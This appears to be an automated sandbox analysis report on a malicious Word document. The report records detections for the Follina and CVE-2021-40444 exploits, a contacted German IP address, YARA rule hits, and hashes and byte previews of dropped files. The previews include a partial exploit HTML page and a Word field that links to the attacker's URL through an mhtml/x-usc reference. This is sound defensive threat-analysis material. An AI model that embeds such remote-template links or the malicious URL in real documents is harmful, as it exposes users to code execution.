      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      5YMh6S8QVr.docx50%VirustotalBrowse
      5YMh6S8QVr.docx31%MetadefenderBrowse
      5YMh6S8QVr.docx100%AviraEXP/CVE-2021-40444.Gen
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://194.34.232.147/side.html%x-usc:http://194.34.232.147/side.html0%Avira URL Cloudsafe
      http://194.34.232.147/side.html%0%Avira URL Cloudsafe
      http://194.34.232.147/side.htmlyX0%Avira URL Cloudsafe
      http://194.34.232.147/side.html0%Avira URL Cloudsafe
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://194.34.232.147/side.htmltrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://194.34.232.147/side.html%x-usc:http://194.34.232.147/side.html~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://194.34.232.147/side.html%~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drfalse
      • Avira URL Cloud: safe
      unknown
      http://194.34.232.147/side.htmlyX~WRF{F962F304-2A52-4E33-A96C-51EE6F4187D8}.tmp.0.drfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      194.34.232.147
      unknownGermany
      35913DEDIPATH-LLCUStrue
      Joe Sandbox Version:35.0.0 Citrine
      Analysis ID:646982
      Start date and time: 16/06/202213:29:372022-06-16 13:29:37 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 45s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:5YMh6S8QVr (renamed file extension from none to docx)
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:8
      Number of new started drivers analysed:1
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.expl.evad.winDOCX@1/23@0/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      No simulations
      No context
      No context
      No context
      No context
      No context
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28785228105969896
      Encrypted:false
      SSDEEP:96:K/pCLmxDa7gBmua0dZxeO3njU4AAeIA4/e2R6iK5mT8e2R6iK5mTiH:3Scu11nXIQkK
      MD5:5DA1085932C7628CBDC0FAAC010F061E
      SHA1:48447DDBF2D6C88D564F90DF5F1645E7E0BF6AEB
      SHA-256:FB957A83FBEA9DE458AC520115581A6BC9A6C6EACC12ABE91C8ACBD40EDBD094
      SHA-512:3868C07E3D68827A0984B9A2AB1221008CDAA22199629F8D9A429B1899A0D29190B2F7E5AF4B075B04D0C756BCF68EF34D2CD6ED5758AAE5D1AE2F14BD293FA8
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z..*..t.H.G]..'u&S,...X.F...Fa.q.............................4q..9.H.I..kL<D.............8I..G...}`.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.6714377365243377
      Encrypted:false
      SSDEEP:768:p+IdEN41lfMRDbKZUsOg7Af3PXldlNV3/vjmldlNw3/vjNldlNq3/vjUldlNq3/v:pwDka8Uj
      MD5:11C1C529D0C834AB8F9EB96863044E30
      SHA1:681A6029B7E617250ABCBBBED2EC142935C18F46
      SHA-256:B1A230959B71B4B8776FD6260667DAA3188D6CF25FA13ECB214D31A6BAF32E4D
      SHA-512:4CB930A77517444AB00A8F074F768665BABBD6AE49F5B0424386AC47C0A5D8DBD5DB376308FE8C380136B5AD808124241AEEACBCB4EF8E75F176B64D4BD97DB6
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z...~...I..M:_n.S,...X.F...Fa.q............................Uyc.c..D.w6............._k...A........S...................................W...............................x...x...x...x..*............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.....5.2A....................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.9626738605132825
      Encrypted:false
      SSDEEP:3:yVlgsRlznejKGSLO4glUWsPWzFzZ276:yPblzneuGSyNbHd22
      MD5:1F085DE74D358FF5A8A2BD5880F91C3B
      SHA1:EEE66A4B685E37D1A1EC88F957160D93BCE4F5DB
      SHA-256:9C00AD097BBB299843459FC4D506153B93731C526FBFB889381406795CAF1075
      SHA-512:16D6647D54B9ED8F2E29BF52EB0F090ABB0D3CAA12F6D3C3AE52C414DD3E35F5CEFDE82FE393B1527D87AA5D07216F78564A40454A41F7A4B67C3639CCB79EA1
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.8.B.3.C.2.3.9.C.-.9.F.5.9.-.4.1.1.F.-.B.E.0.D.-.9.B.5.7.0.7.1.6.3.9.9.E.}...F.S.D..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.28834336005255745
      Encrypted:false
      SSDEEP:48:I33xdwXRBjupl7i/pSjptWDps7SP/Ot1nrOEF+nEF+nKH:K3xdKLWind/Ot1rxUnEUnKH
      MD5:08A9D3299E3EFE5FA48341CB0EAA4DE8
      SHA1:C89ACE8E155558EEBD47B5D221E331EA6C33B78D
      SHA-256:53CD44BB963E066DD644E9680906C9C807AD59C24A7F942A9951E9E1CBE69228
      SHA-512:04B142E7A289EB93E97624105B307046D12A9CD43AE2656676A0B9424D7921B4FF5EC02268D276B9129A21398D376D085E077542EBDFD6D56F3EEF1A976C28FB
      Malicious:false
      Reputation:low
      Preview:......M.eFy...zB^\/...I..w.Y.a.S,...X.F...Fa.q............................."/!..QJ.x.#.z(........E.....A...0...0.A...................................E...............................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G.........J..R.w.ps............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.22217115681084815
      Encrypted:false
      SSDEEP:24:I3mUtLwnM0B34Qyy79s3PB2xiNqrhcaFUZ8+74I7pSe9LS7k77KrYz57O7N4:I3LUrBjyt2xQMM2+8I719LS46ktae
      MD5:5E8A60A1A25571F52092360EFF4D8D65
      SHA1:CE28B9992B13EA3DA9935E3262950E97614B5E11
      SHA-256:8C10C3D391E414F91508CC063B0A0D4383D438A532EA812B0D10B2F45CC462CF
      SHA-512:1391DAA2F9E6984420BE39527FCACAA51EAA41ED54089D9A69805EC5E09F15F0D22C49301495711953A2FA8222E013682368EF96E047FF1D1F1CBA9DA1D35214
      Malicious:false
      Reputation:low
      Preview:......M.eFy...z.N...?B..^...GS,...X.F...Fa.q.............................<`VX0CI.Vg..i<}.........8..J..@."%B...BP>..................................PB...............................x...x...x...x..........+....................................................................................................................................................................................................................................................................................................................zV.......... ..@....p..G...s.q.Q9G..a`..qb.....p..G...|.u-.u.A...W"U.............................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):114
      Entropy (8bit):3.895046615385681
      Encrypted:false
      SSDEEP:3:yVlgsRlz6sWKRhlrNW0RBgqWjit2lQ5Yc3IFl276:yPblzrNTQHlQ/Q22
      MD5:4527D001AD62B86AAF56B48D884E17FD
      SHA1:2942632907C67FC9E50CAD913EDEAF8FC6AF6E80
      SHA-256:4CBC90753C161B4936757869FF7AAF66936381104D20EAD8A6A2E568C96686A8
      SHA-512:89F0BE467ED8FD78B4628EE418A6151D2EC3B6C82A38CB12277BA3226484F82AD9C46E3D511099B78970635CDF9EE02CFDFABEC08149364F1D269C578B79C396
      Malicious:false
      Reputation:low
      Preview:..H..@....b..q....]F.S.D.-.{.7.2.C.8.5.F.1.4.-.C.2.D.2.-.4.B.9.4.-.9.E.C.6.-.F.5.8.2.8.4.5.5.F.7.9.2.}...F.S.D..
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:downloaded
      Size (bytes):6774
      Entropy (8bit):0.7823015818904822
      Encrypted:false
      SSDEEP:6:qTFQzhqIAXMzSKWEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEM:qTWvzSsAxH8d2GZfgGw1sue4kVM1Gb
      MD5:EA3FE2CB4B8E3C7AFA0C773A28742AA8
      SHA1:FC00C991825CFE83AC01AD60D9BCE9E5DE2D061D
      SHA-256:8D68FC5C45CDFD449252B1E3E2EC8A1E35E00C83532628102E5F699A1190D101
      SHA-512:73E55B24AE1DE1794745B1C168ACDFDDF8F15BD7DB611867773CA94BB9A8688D46D3E781B1AAE274879E002043465B03A1736BA7FA5D563F9AA67C459F649710
      Malicious:true
      Yara Hits:
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, Author: Joe Security
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\side[1].htm, Author: Joe Security
      Reputation:low
      IE Cache URL:http://194.34.232.147/side.html
      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):6774
      Entropy (8bit):0.7823015818904822
      Encrypted:false
      SSDEEP:6:qTFQzhqIAXMzSKWEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEM:qTWvzSsAxH8d2GZfgGw1sue4kVM1Gb
      MD5:EA3FE2CB4B8E3C7AFA0C773A28742AA8
      SHA1:FC00C991825CFE83AC01AD60D9BCE9E5DE2D061D
      SHA-256:8D68FC5C45CDFD449252B1E3E2EC8A1E35E00C83532628102E5F699A1190D101
      SHA-512:73E55B24AE1DE1794745B1C168ACDFDDF8F15BD7DB611867773CA94BB9A8688D46D3E781B1AAE274879E002043465B03A1736BA7FA5D563F9AA67C459F649710
      Malicious:false
      Reputation:low
      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):6774
      Entropy (8bit):0.7823015818904822
      Encrypted:false
      SSDEEP:6:qTFQzhqIAXMzSKWEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEM:qTWvzSsAxH8d2GZfgGw1sue4kVM1Gb
      MD5:EA3FE2CB4B8E3C7AFA0C773A28742AA8
      SHA1:FC00C991825CFE83AC01AD60D9BCE9E5DE2D061D
      SHA-256:8D68FC5C45CDFD449252B1E3E2EC8A1E35E00C83532628102E5F699A1190D101
      SHA-512:73E55B24AE1DE1794745B1C168ACDFDDF8F15BD7DB611867773CA94BB9A8688D46D3E781B1AAE274879E002043465B03A1736BA7FA5D563F9AA67C459F649710
      Malicious:true
      Yara Hits:
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34450540.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\34450540.htm, Author: Joe Security
      Reputation:low
      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:HTML document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):6774
      Entropy (8bit):0.7823015818904822
      Encrypted:false
      SSDEEP:6:qTFQzhqIAXMzSKWEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEM:qTWvzSsAxH8d2GZfgGw1sue4kVM1Gb
      MD5:EA3FE2CB4B8E3C7AFA0C773A28742AA8
      SHA1:FC00C991825CFE83AC01AD60D9BCE9E5DE2D061D
      SHA-256:8D68FC5C45CDFD449252B1E3E2EC8A1E35E00C83532628102E5F699A1190D101
      SHA-512:73E55B24AE1DE1794745B1C168ACDFDDF8F15BD7DB611867773CA94BB9A8688D46D3E781B1AAE274879E002043465B03A1736BA7FA5D563F9AA67C459F649710
      Malicious:true
      Yara Hits:
      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47FC82E2.htm, Author: Tobias Michalski, Christian Burkard
      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\47FC82E2.htm, Author: Joe Security
      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Targa image data - Map - RLE 5 x 65536 x 0 "\004"
      Category:dropped
      Size (bytes):52
      Entropy (8bit):1.8614575055208968
      Encrypted:false
      SSDEEP:3:Vm1olpUktK0Xg/lrll0:MW6kK0XgtI
      MD5:07FFEFF17A8A1A1209AB3C2690D569D4
      SHA1:37CB513FABDDCDBBAA2E7296B31A4BC9832E1B01
      SHA-256:57CFA30BB860B95B7012ED62427025959B671D270AAF67FC406FBC3C4F3C48D4
      SHA-512:743591E7BFE9936EEE057C9D1769595D48C90BA28057D8EBD0F7299B8FCACD7B8FA50AF30BD0B8B6E09F77ADE16B47D6F0ABB079D60E975443A57C514099AD86
      Malicious:false
      Preview:....................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 224x224, frames 3
      Category:dropped
      Size (bytes):9805
      Entropy (8bit):7.943364058434094
      Encrypted:false
      SSDEEP:192:eWSC3lgsFHUzdeJQnmRLMdno3Y1CQdlCQ3rHlX0wbaanHUwiCIviXNNLko/H2K:eujKzdXxt/CeCiFSwxNNAwWK
      MD5:98B5273E3C1D3B27777A1A17E51478A5
      SHA1:AA6854BA61CEADCCC58F3DC01680D94205B83671
      SHA-256:3953378734D19ABC3AAC6F760C713A10300517C40DD605C7D7518995914205AA
      SHA-512:4684921304A199470F7E11F85F5200EB670077D692D46CCA6DE0E4ADD3D32A90B4756EFAB612B5C22552239FA13031B44A06E306F3F97A80933348270AF8F16F
      Malicious:false
      Preview:......JFIF...................................................(!..%...!1!&)+../..383,7*-.-...........-& &/--.--/-/-++--------------------------------------...........".......................................9.........................!.1."AQa.2q...BR..#3.....$Cb.r................................5......................!1.A.Qaq".....2...r.....#3BR............?..T...b..M.:.7_..B.P.....e...Q".I.....v..@a...};V......'S......D..5*.I..3C.....#6?a........{..mF..*KLJ`5.i@.A.@Bp4@.....).YJ.4.D`...)=.3.|...^..y\$h]..2I.x......FTF.n%I.cF...#..C.....I.-.?g..F...H4`..b.0i@..\.Bp4@...T..q.l.I...S.#z.)...'9....A"R...J...JQ....J.....&W.A..B.^.Wk./Wk.......)...^.+R....L...R.L....].O1M.p..~p....4.......I2..;..6.q.A...dU..7.H.....)<..pG....G.s..F......D....&.4.fi[i....... .g=...}.}f.,..........~q.j_LX..L..Y1...=.cL.I..v..*..oK....D...I.r..9.g<py.j.s...m.~z+.k*S5\3.?.....0kb.~.....o=..V.&..Hy..2.v.q...#./..y..z.m`.Cg..I....mv.I..p{....8....dw.(.HT.V ..A......;..v.rv\.}..#..v.....J......
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:ms-windows metafont .wmf
      Category:dropped
      Size (bytes):74
      Entropy (8bit):2.117514616373907
      Encrypted:false
      SSDEEP:3:t/Wlsl81olpUktK0Xg/lrll0:t/d8W6kK0XgtI
      MD5:C4E6B3035AC3828D375E5479E8485D0D
      SHA1:624B2E68B669293CE5EF5EDA4EFCFDE97FFEA84A
      SHA-256:591890CBBED60EF32252835A3F13362E9204F1088E5EFA9E164A3526B612C4D7
      SHA-512:1864A7CBF1C5205F0D1CAC9DA5CA4E8F103B9C045913A98B8A9DA62B3850AB842913235BF38DA6C7D78ECE985D35EBC8F6C15471B5C2FE23A6A4BBF66A03E4DB
      Malicious:false
      Preview:.............`.....qW....................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:Composite Document File V2 Document, Cannot read section info
      Category:dropped
      Size (bytes):6656
      Entropy (8bit):2.3934301216447316
      Encrypted:false
      SSDEEP:24:rsMnGO5p0LyAiiUzvoEoii9K/qX6HyAii9zyAi:r/DiUliI8i
      MD5:09143DB5A71D2128B003B2AE1D67725E
      SHA1:EF415275963EC769FE28F527F4BFF3786E382074
      SHA-256:D1BA339319AB2C08E94E50C2E4564C2BB6B62F4050A4ED9907C26D62478A2E0E
      SHA-512:34B0471DE7D8BB32013F507D5664C6CC4EB539EB98F38DA06DDDBF3CD59E565949E57533D06F1FA872878ECAD08F7C54CEF94EE76B4CE039BAAE43C0186BF713
      Malicious:false
      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):4532
      Entropy (8bit):3.5486738810837544
      Encrypted:false
      SSDEEP:96:GI0z2qRb55efGIdspaWLtiT02kDmECITUgm6zu8HGg:Z0HR1HxmECGpZmg
      MD5:D50E7225C855D7301F2C33659817042D
      SHA1:9888F7AF06EEB7CF4D6EC5D07B2B3F07E1353652
      SHA-256:9CF291E21A85224F9A7E9A43C82F864A5EFE6F51DD9124553A2CBEDDC7F6D0A4
      SHA-512:8AEF9931A68B1725626A9F568C79EC07DA126B52305560D526487B22A696539B4E78847F25084B53FBBD52ACC0A7F622CA02B763F312F9D963E597C400C4ED4A
      Malicious:false
      Preview:../...L.e.t.t.e.r. .b.e.f.o.r.e. .s.m.a.l.l. .c.l.a.i.m.s. .c.o.u.r.t. .c.l.a.i.m...L.I.N.K. .h.t.m.l.f.i.l.e. .".m.h.t.m.l.:.h.t.t.p.:././.1.9.4...3.4...2.3.2...1.4.7./.s.i.d.e...h.t.m.l.!.x.-.u.s.c.:.h.t.t.p.:././.1.9.4...3.4...2.3.2...1.4.7./.s.i.d.e...h.t.m.l.". .".". .\.p. .\.f. .0..... . .....8.0.5.0. .W.e.s.t. .7.8.t.h. .S.t.r.e.e.t...M.i.n.n.e.a.p.o.l.i.s.,. .M.N. .5.5.4.3.9...........................................................................................................................................,.......z...............(...................(...H...b.......................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):1024
      Entropy (8bit):0.05390218305374581
      Encrypted:false
      SSDEEP:3:ol3lYdn:4Wn
      MD5:5D4D94EE7E06BBB0AF9584119797B23A
      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
      Malicious:false
      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):131072
      Entropy (8bit):0.025675392455075247
      Encrypted:false
